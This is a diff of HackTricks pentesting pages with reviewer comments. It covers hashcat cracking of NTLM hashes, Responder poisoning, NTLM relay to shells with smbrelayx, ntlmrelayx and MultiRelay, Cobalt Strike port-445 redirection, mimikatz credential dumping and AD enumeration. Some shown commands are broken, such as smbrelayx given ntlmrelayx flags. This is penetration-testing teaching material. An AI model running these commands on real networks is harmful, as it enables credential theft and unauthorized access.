mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GitBook: [#3375] No subject
parent 268d48c250
commit 8007252a2d
8 changed files with 213 additions and 51 deletions
BIN .gitbook/assets/image (4) (2).png (new file, binary not shown; size 947 KiB)
Binary file not shown (size before: 947 KiB, after: 99 KiB)
Binary file not shown (size before: 99 KiB, after: 176 KiB)
|
@ -621,6 +621,21 @@ hash-identifier
|
|||
> <HASH>
|
||||
```
|
||||
|
||||
### Wordlists
|
||||
|
||||
* **Rockyou**
|
||||
* ****[**Probable-Wordlists**](https://github.com/berzerk0/Probable-Wordlists)****
|
||||
* ****[**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists)****
|
||||
* ****[**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords)****
|
||||
|
||||
### **Wordlist Generation Tools**
|
||||
|
||||
* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Advanced keyboard-walk generator with configureable basechars, keymap and routes.
|
||||
|
||||
```bash
|
||||
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
|
||||
```
|
||||
|
||||
### John mutation
|
||||
|
||||
Read _**/etc/john/john.conf**_ and configure it
|
||||
|
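Review bot: the three new wordlist bullets (Probable-Wordlists, Kaonashi, Seclists) are wrapped in stray `****` runs on both sides of the link, which GitBook renders as literal asterisks, and Rockyou is the only entry without a link; drop the empty bold markers and, in the kwprocessor bullet, fix "configureable" to "configurable". The kwp64.exe line itself is fine: a basechars file, a keymap file and a routes file are the three positional arguments the tool takes, and `-o` names the output.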
@ -632,6 +647,78 @@ john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
|
|||
|
||||
### Hashcat
|
||||
|
||||
#### Hashcat attacks
|
||||
|
||||
* **Wordlist attack** (`-a 0`) with rules
|
||||
|
||||
**Hashcat** already comes with a **folder containing rules** but you can find [**other interesting rules here**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
|
||||
|
||||
```
|
||||
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
|
||||
```
|
||||
|
||||
* **Wordlist combinator** attack
|
||||
|
||||
It's possible to **combine 2 wordlist into 1** with hashcat.\
|
||||
If the list 1 contained the word **"hello"** and the second contained 2 lines with the words **"world"** and **"earth"**. The words `helloworld` and `helloearth` will be generated.
|
||||
|
||||
```bash
|
||||
# This will combine 2 wordlists
|
||||
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
|
||||
|
||||
# Same attack as before but adding chars in the newly generated words
|
||||
# In the rpevious example this will generate:
|
||||
## hello-world!
|
||||
## hello-earth!
|
||||
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
|
||||
```
|
||||
|
||||
* **Mask attack** (`-a 3`)
|
||||
|
||||
```bash
|
||||
# Mask attack with simple mask
|
||||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
|
||||
|
||||
hashcat --help #will show the charsets and are as follows
|
||||
? | Charset
|
||||
===+=========
|
||||
l | abcdefghijklmnopqrstuvwxyz
|
||||
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
|
||||
d | 0123456789
|
||||
h | 0123456789abcdef
|
||||
H | 0123456789ABCDEF
|
||||
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
|
||||
a | ?l?u?d?s
|
||||
b | 0x00 - 0xff
|
||||
|
||||
# Mask attack decalring custom charset
|
||||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
|
||||
## -1 ?d?s defines a custom charset (digits and specials).
|
||||
## ?u?l?l?l?l?l?l?l?1 is the mask, where ?1 is the custom charset.
|
||||
|
||||
# Mask attack with variable password length
|
||||
## Create a file called masks.hcmask with this content:
|
||||
?d?s,?u?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?l?l?1
|
||||
?d?s,?u?l?l?l?l?l?l?l?l?1
|
||||
## Use it to crack the password
|
||||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
|
||||
```
|
||||
|
||||
* Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) attack
|
||||
|
||||
```bash
|
||||
# Mask numbers will be appended to each word in the wordlist
|
||||
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
|
||||
|
||||
# Mask numbers will be prepended to each word in the wordlist
|
||||
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
|
||||
```
|
||||
|
||||
#### Hashcat modes
|
||||
|
||||
```bash
|
||||
hashcat --example-hashes | grep -B1 -A2 "NTLM"
|
||||
```
|
||||
|
|
|
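Review bot: the combinator-with-rules line `hashcat.exe -a 1 ... -j $- -k $!` sits in a block tagged `bash`, and a bash shell will expand `$-` (the current option flags) and `$!` (PID of the last background job) before hashcat sees them, so the rules arrive mangled; either single-quote them (`-j '$-' -k '$!'`) or say the line is meant for cmd.exe, which the `hashcat.exe` name suggests. Smaller points in the same hunk: "rpevious" and "decalring" are typos; "If the list 1 contained the word ..." is a fragment that should be joined to the sentence after it; the `-a 6`/`-a 7` examples use `\wordlist.txt` where every other example uses `.\`; and the first hashcat fence has no language tag while the others are `bash`. The mask material is correct as written: `-1 ?d?s` with `?1` in the mask, and `.hcmask` lines that put the custom charset before the comma, are the right form for a variable-length run.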
@ -1,7 +1,5 @@
|
|||
# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
|
||||
|
||||
## Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -37,7 +35,9 @@ Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from th
|
|||
|
||||
Responder automates the WPAD attack—running a proxy and directing clients to a malicious WPAD server via DHCP, DNS, LLMNR, and NBT-NS.
|
||||
|
||||
## Responder
|
||||
## Protocols Poisoning
|
||||
|
||||
### Responder - LLMNR, NBT-NS and MDNS
|
||||
|
||||
> Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to _specific_ NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: [http://support.microsoft.com/kb/163409](http://support.microsoft.com/kb/163409)). By default, the tool will only answer to File Server Service request, which is for SMB.
|
||||
>
|
||||
|
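Review bot: the blockquote under the new "Responder - LLMNR, NBT-NS and MDNS" heading drops a word from the Responder README it quotes: "Responder an LLMNR, NBT-NS and MDNS poisoner" should read "Responder is an LLMNR, NBT-NS and MDNS poisoner".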
@ -121,7 +121,7 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s
|
|||
|
||||
The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`
|
||||
|
||||
## DHCP Poisoning
|
||||
### DHCP Poisoning
|
||||
|
||||
Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.
|
||||
|
||||
|
@ -135,7 +135,7 @@ However, spoofing DHCP answers has unique benefits. **It's definitely stealthier
|
|||
./Responder.py -I eth0 -Pdv
|
||||
```
|
||||
|
||||
## Capturing credentials
|
||||
### Capturing credentials
|
||||
|
||||
Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):
|
||||
|
||||
|
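Review bot: in the "Capturing credentials" paragraph the closing bold marker lands inside a word ("Responde**r"), and "Once some user try to access ... he will try to authenticate" needs agreement; suggest "Once a user tries to access a service resolved through those protocols, the client will try to authenticate against Responder". Worth fixing while the heading is being demoted to `###`.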
@ -143,57 +143,81 @@ It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
|
|||
|
||||
![](<../../.gitbook/assets/poison (1) (1).jpg>)
|
||||
|
||||
## Inveigh
|
||||
### Inveigh - C#/PowerShell Responder
|
||||
|
||||
> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
|
||||
|
||||
[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)is a PowerShell script that has the same main features as Responder.
|
||||
[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder.\
|
||||
Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero).
|
||||
|
||||
![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png)
|
||||
|
||||
## Relay Attack
|
||||
## NTML Relay Attack
|
||||
|
||||
**Most of the information for this section was taken from** [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)
|
||||
This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.
|
||||
|
||||
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.
|
||||
### 445 forward and tunneling
|
||||
|
||||
The 3 main **tools** to perform this attack are: **smb\_relay** (metasploit), **MultyRelay** (responder), and **smbrealyx** (impacket).
|
||||
{% hint style="warning" %}
|
||||
If you can **introduce a machine inside the network** you can use any of the **tools** of the following section to perform a relay attack and you don't need to care about this.
|
||||
{% endhint %}
|
||||
|
||||
Independently of the tool, first, you need to **turn Off SMB and HTTP servers** in **/usr/share/responder/Responder.conf** and then execute responder on the desired **interface**: `responder -I eth0 -v`
|
||||
However, in red teams this isn't the case, in red teams you usually will need to **forward the traffic of the port 445 of a Windows machine to your machine** executing any of the following tools and then r**oute back the traffic of that tool through a proxy** to reach the machine to attack inside the internal.
|
||||
|
||||
You can perform this attack using **metasploit module**: `exploit/windows/smb/smb_relay`
|
||||
The tool [**PortBender**](https://github.com/praetorian-inc/PortBender) **** is a driver to **redirect** traffic destined for port **445 to another port** (e.g. 8445) that **we can bind**. It **requires local admin** access in order for the driver to be loaded. It makes sense to use `cd C:\Windows\System32\drivers` since this is where most Windows drivers go.
|
||||
|
||||
The option `SRVHOST` is used to point the server **were you want to get access**. Then, when **any host try to authenticate against you**, metasploit will **try to authenticate against the other** server.
|
||||
```bash
|
||||
Cobalt Strike -> Script Manager -> Load (Select from the filesystem PortBender.cna)
|
||||
|
||||
You **can't authenticate against the same host that is trying to authenticate against you** (MS08-068). **Metasploit** will **always** send a "_**Denied**_" **response** to the **client** that is trying to connect to you.
|
||||
|
||||
If you want to use **smbrelayx** now you should run:
|
||||
beacon> cd C:\Windows\system32\drivers # Go to drivers dir
|
||||
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
|
||||
beacon> PortBender redirect 445 8445 # Forward traffic to 445 to 8445
|
||||
beacon> rportfwd 8445 127.0.0.1 445 # Send traffic to port 8445 to Team Server
|
||||
beacon> socks 1080 # Socks proxy in port 1080 to attack host in the internal network from the Team Server
|
||||
|
||||
# To kill
|
||||
beacon> jobs
|
||||
beacon> jobkill 0
|
||||
beacon> rportfwd stop 8445
|
||||
beacon> socks stop
|
||||
```
|
||||
smbrelayx.py -h <IP target> -c "ipconfig"
|
||||
|
||||
### Metasploit
|
||||
|
||||
```bash
|
||||
setg Proxies socks4:127.0.0.1:1080 # Use this if you need to route the traffic to reach the attacked ip
|
||||
set SRVHOST <local_ip>
|
||||
set SRVPORT 445
|
||||
set SMBHOST <ip_to_auth_to>
|
||||
run -j
|
||||
```
|
||||
|
||||
### smbrelayx
|
||||
|
||||
```bash
|
||||
python3 smbrelayx.py -t smb://<ip_to_attack> -smb2support --no-http-server --no-wcf-server
|
||||
# By default it will just dump hashes
|
||||
# To execute a command use: -c "ipconfig"
|
||||
# To execute a backdoor use: -e "/path/to/backdoor
|
||||
|
||||
# Attack through socks proxy
|
||||
proxychains python3 ntlmrelayx.py -t smb://<ip_to_attack> -smb2support --no-http-server --no-wcf-server
|
||||
```
|
||||
|
||||
### MultyRelay
|
||||
|
||||
If you want to use **MultiRelay**, go to _**/usr/share/responder/tools**_ and execute MultiRelay (`-t <IP target> -u <User>`):
|
||||
|
||||
```bash
|
||||
python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
|
||||
```
|
||||
<pre class="language-bash"><code class="lang-bash"><strong>python MultiRelay.py -t <IP target> -u ALL # If "ALL" then all users are relayed
|
||||
</strong># By default a shell is returned
|
||||
python MultiRelay.py -t <IP target> -u ALL -c whoami #-c to execute command
|
||||
python MultiRelay.py -t <IP target> -u ALL -d #-d to dump hashes
|
||||
|
||||
# Use proxychains if you need to route the traffic to reach the attacked ip</code></pre>
|
||||
|
||||
![](<../../.gitbook/assets/image (209) (1).png>)
|
||||
|
||||
### Post-Exploitation (MultiRelay)
|
||||
|
||||
**At this point you can shut off Responder; we don’t need it anymore.**\
|
||||
**With the shell access we have obtained, there are many actions that we can perform directly from here:**
|
||||
|
||||
**Mimikatz** commands can also be performed directly **from the shell**. Unfortunately, the target used for this tutorial’s antivirus ate my mimikatz, but the following commands can be executed to run mimikatz, as well as the entire pallette of modules.: **`Mimi sekurlsa::logonpasswords`**
|
||||
|
||||
## InveighZero
|
||||
|
||||
InveighZero is a C# LLMNR/NBNS/mDNS/DNS/DHCPv6 spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. This version shares many features with the PowerShell version of Inveigh.\
|
||||
More information in the [github of the project](https://github.com/Kevin-Robertson/InveighZero).
|
||||
|
||||
## Force Privileged Accounts to login via NTLM
|
||||
### Force NTLM Logins
|
||||
|
||||
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
|
||||
|
||||
|
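Review bot: under the "### smbrelayx" heading the first command hands smbrelayx.py options it does not have: `-t smb://<ip_to_attack>`, `--no-http-server` and `--no-wcf-server` are ntlmrelayx.py flags, while smbrelayx.py takes its target as `-h <IP target>` (as the removed line `smbrelayx.py -h <IP target> -c "ipconfig"` shows). Either retitle the section and change the first command to `ntlmrelayx.py`, matching the proxychains line below it, or restore the `-h` form; and `-e "/path/to/backdoor` is missing its closing quote. The rewrite also drops the removed instruction to turn off the SMB and HTTP servers in /usr/share/responder/Responder.conf before relaying, which is still required: with them on, Responder answers the SMB/HTTP authentication itself and ntlmrelayx/MultiRelay never receive it. The removed MS08-068 caveat (you cannot relay back to the host that is authenticating to you) is worth keeping for the same reason. "NTML Relay Attack" should be NTLM, and note that renaming the heading from "Relay Attack" changes its GitBook anchor, so the `#relay-attack` links added to the Active Directory page in this same commit will stop resolving. Finally, "MultyRelay" should be MultiRelay, the `<pre class="language-bash"><code ...><strong>` block should be a plain fenced block like the rest of the page, and the new "Inveigh - C#/PowerShell Responder" subsection now says Inveigh is the C# binary and links InveighZero while a separate "## InveighZero" section still describes it as its own tool further down; the two should be consolidated.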
@ -251,11 +275,12 @@ To mitigate against the WPAD attack, you can add an entry for "wpad" in your DNS
|
|||
|
||||
## References
|
||||
|
||||
**Images from:**\
|
||||
[https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
|
||||
[https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)\
|
||||
[https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)\
|
||||
[https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
|
||||
* [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)
|
||||
* **Images from:**\
|
||||
[https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
|
||||
[https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)\
|
||||
[https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)\
|
||||
[https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
|
||||
|
||||
<details>
|
||||
|
||||
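Review bot: the rewritten References list cites https://intrinium.com/smb-relay-attack-tutorial/ twice, once as its own bullet and again inside the "Images from:" bullet; keep one of them.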
|
|
|
@ -172,6 +172,50 @@ beacon> socks 1080
|
|||
proxychains nmap -n -Pn -sT -p445,3389,5985 10.10.17.25
|
||||
```
|
||||
|
||||
### rPort2Port
|
||||
|
||||
{% hint style="warning" %}
|
||||
In this case the **port is opened in the beacon host**, not in the Team Server and the traffic is sent to the Team Server and from there to the indicated host:port
|
||||
{% endhint %}
|
||||
|
||||
```bash
|
||||
rportfwd [bind port] [forward host] [forward port]
|
||||
rportfwd stop [bind port]
|
||||
```
|
||||
|
||||
To note:
|
||||
|
||||
* Beacon's reverse port forward **always tunnels the traffic to the Team Server** and the **Team Server sends the traffic to its intended destination**, so shouldn't be used to relay traffic between individual machines.
|
||||
* The **traffic is tunnelled inside Beacon's C2 traffic**, not over separate sockets, and also works over P2P links.
|
||||
* You **don't need to be a local admin** to create reverse port forwards on high ports.
|
||||
|
||||
### rPort2Port local
|
||||
|
||||
{% hint style="warning" %}
|
||||
In this case the **port is opened in the beacon host**, not in the Team Server and the **traffic is sent to the Cobalt Strike client** (not to the Team Server) and from there to the indicated host:port
|
||||
{% endhint %}
|
||||
|
||||
```
|
||||
rportfwd_local [bind port] [forward host] [forward port]
|
||||
rportfwd_local stop [bind port]
|
||||
```
|
||||
|
||||
## Windows netsh
|
||||
|
||||
### Port2Port
|
||||
|
||||
You need to be local admin (for any port)
|
||||
|
||||
```bash
|
||||
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
|
||||
# Example:
|
||||
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444
|
||||
# Check the port forward was created:
|
||||
netsh interface portproxy show v4tov4
|
||||
# Delete port forward
|
||||
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
|
||||
```
|
||||
|
||||
## reGeorg
|
||||
|
||||
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
|
||||
|
|
|
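Review bot: the new netsh portproxy block should state two preconditions the reader will run into: the IP Helper service (iphlpsvc) must be running for a portproxy mapping to forward anything, and the listening port still needs a Windows Firewall allow rule, since local admin only lets you create the mapping. The first line of the block is a parameter template with empty values and fails if pasted as-is, so label it as syntax. `netsh interface portproxy show all` and `netsh interface portproxy reset` are useful companions to the `show v4tov4` and `delete` lines. Elsewhere in the hunk the `rportfwd_local` fence is untagged while the `rportfwd` one is `bash`; the three "To note" bullets are accurate, including that reverse port forwards on high ports need no local admin.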
@ -70,7 +70,7 @@ If you just have access to an AD environment but you don't have any credentials/
|
|||
* [**A more detailed guide on how to enumerate LDAP can be found here.**](../../network-services-pentesting/pentesting-ldap.md)
|
||||
* **Poison the network**
|
||||
* Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||||
* Access host by [abusing the relay attack](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
|
||||
* Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)****
|
||||
* Gather credentials **exposing** [**fake UPnP services with evil-S**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
|
||||
* [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology):
|
||||
* Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available.
|
||||
|
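Review bot: the relay bullet links to `#relay-attack`, but the same commit renames that heading to "NTML Relay Attack" in the spoofing page, so the fragment will no longer match; update it together with the heading (and with the NTLM spelling fix). The bullet also ends in a stray `****` run. The evil-SSDP bullet splits the tool name across two links ("evil-S" to the SSDP page and "SDP" to the medium article), which renders oddly; link "evil-SSDP" as one and keep the medium article as a separate reference.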
@ -126,21 +126,23 @@ For this phase you need to have **compromised the credentials or a session of a
|
|||
|
||||
### Enumeration
|
||||
|
||||
#### Extracting all domain users
|
||||
|
||||
It's very easy to obtain all the domain usernames from Windows (`net user /domain` ,`Get-DomainUser` or `wmic useraccount get name,sid`). In Linux, you can use: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` or `enum4linux -a -u "user" -p "password" <DC IP>`
|
||||
|
||||
Having compromised an account is a **big step to start compromising the whole domain**, because you are going to be able to start the **Active Directory Enumeration:**
|
||||
|
||||
Regarding [**ASREPRoast**](asreproast.md) you can now find every possible vulnerable user, and regarding [**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords.
|
||||
|
||||
* You could use some [Windows binaries from the CMD to perform a basic recon](../basic-cmd-for-pentesters.md#domain-info), but using [powershell for recon](../basic-powershell-for-pentesters/) will probably be stealthier, and you could even [**use powerview**](../basic-powershell-for-pentesters/powerview.md) to extract more detailed information.
|
||||
* You could use the [**CMD to perform a basic recon**](../basic-cmd-for-pentesters.md#domain-info)
|
||||
* You can also use [**powershell for recon**](../basic-powershell-for-pentesters/) which will be stealthier
|
||||
* You ca also [**use powerview**](../basic-powershell-for-pentesters/powerview.md) to extract more detailed information
|
||||
* Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a try. Find where users can RDP, find path to other groups, etc.
|
||||
* Look in the LDAP database, with **ldapsearch** or **AdExplorer.exe** to look for credentials in fields _userPassword_ & _unixUserPassword_, or even for _Description_. cf. [Password in AD User comment on PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) for other methods.
|
||||
* If you are using **Linux**, you could also enumerate the domain using [the-useless-one/pywerview](https://github.com/the-useless-one/pywerview).
|
||||
* A **tool with GUI** that you can use to enumerate the directory is **AdExplorer.exe** from **SysInternal** Suite.
|
||||
* You can also search in the LDAP database with **ldapsearch** to look for credentials in fields _userPassword_ & _unixUserPassword_, or even for _Description_. cf. [Password in AD User comment on PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) for other methods.
|
||||
* If you are using **Linux**, you could also enumerate the domain using [**pywerview**](https://github.com/the-useless-one/pywerview).
|
||||
* You could also try automated tools as:
|
||||
* [tomcarver16/ADSearch](https://github.com/tomcarver16/ADSearch)
|
||||
* [61106960/adPEAS](https://github.com/61106960/adPEAS)
|
||||
* [**tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)****
|
||||
* ****[**61106960/adPEAS**](https://github.com/61106960/adPEAS)****
|
||||
* #### Extracting all domain users
|
||||
|
||||
It's very easy to obtain all the domain usernames from Windows (`net user /domain` ,`Get-DomainUser` or `wmic useraccount get name,sid`). In Linux, you can use: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` or `enum4linux -a -u "user" -p "password" <DC IP>`
|
||||
|
||||
> Even if this Enumeration section looks small this is the most important part of all. Access the links (mainly the one of cmd, powershell, powerview and BloodHound), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.
|
||||
|
||||
|
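Review bot: "* #### Extracting all domain users" nests a level-4 heading inside a list item, which Markdown renders as literal `####` text, and it also pulls the following paragraph under the list; the removed version had it as a standalone heading and it should stay one. "You ca also" is missing a letter, and the ADSearch/adPEAS bullets carry `****` runs at their ends. The commands in the moved paragraph (`net user /domain`, `Get-DomainUser`, `wmic useraccount get name,sid`, `GetADUsers.py -all -dc-ip ... domain.com/username`, `enum4linux -a -u "user" -p "password" <DC IP>`) are fine as written.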
@ -172,6 +174,10 @@ It's very **unlikely** that you will find **tickets** in the current user **givi
|
|||
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
|
||||
```
|
||||
|
||||
### NTML Relay
|
||||
|
||||
If you have managed to enumerate the active directory you will have **more emails and a better understanding of the network**. You might be able to to force NTML [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**.**
|
||||
|
||||
## Privilege escalation on Active Directory WITH privileged credentials/session
|
||||
|
||||
**For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.**
|
||||
|
|
|
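Review bot: the new "NTML Relay" subsection spells NTLM as NTML in both the heading and the sentence, and "be able to to force" doubles "to". The `#relay-attack` fragment also needs to follow the heading rename made to the spoofing page in this commit, or the link will not resolve.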
@ -22,7 +22,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
The [MMC Application Class (MMC20.Application)](https://technet.microsoft.com/en-us/library/cc181199.aspx) COM object allows you to script components of MMC snap-in operations. While enumerating the different methods and properties within this COM object, I noticed that there is a method named `ExecuteShellCommand` under Document.ActiveView.
|
||||
|
||||
![](<../../.gitbook/assets/image (4).png>)
|
||||
![](<../../.gitbook/assets/image (4) (2).png>)
|
||||
|
||||
You can read more on that method [here](https://msdn.microsoft.com/en-us/library/aa815396\(v=vs.85\).aspx). So far, we have a DCOM application that we can access over the network and can execute commands. The final piece is to leverage this DCOM application and the ExecuteShellCommand method to obtain code execution on a remote host.
|
||||
|
||||
|
@ -38,7 +38,7 @@ It is then possible to invoke the `ExecuteShellCommand` method to start a proces
|
|||
|
||||
The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access:
|
||||
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (4).png>)
|
||||
|
||||
You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\
|
||||
Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)’s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`:
|
||||
|
|
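Review bot: this hunk swaps `image.png` for `image (4).png`, which is the asset the ExecuteShellCommand paragraph referenced before this commit (now changed to `image (4) (2).png`), and the file list at the top shows binaries being replaced with different sizes. Please confirm the rendered page shows the ExecuteShellCommand method screenshot at the first reference and the LaunchPermissions screenshot at the second, since reusing an asset name like this is easy to get crossed.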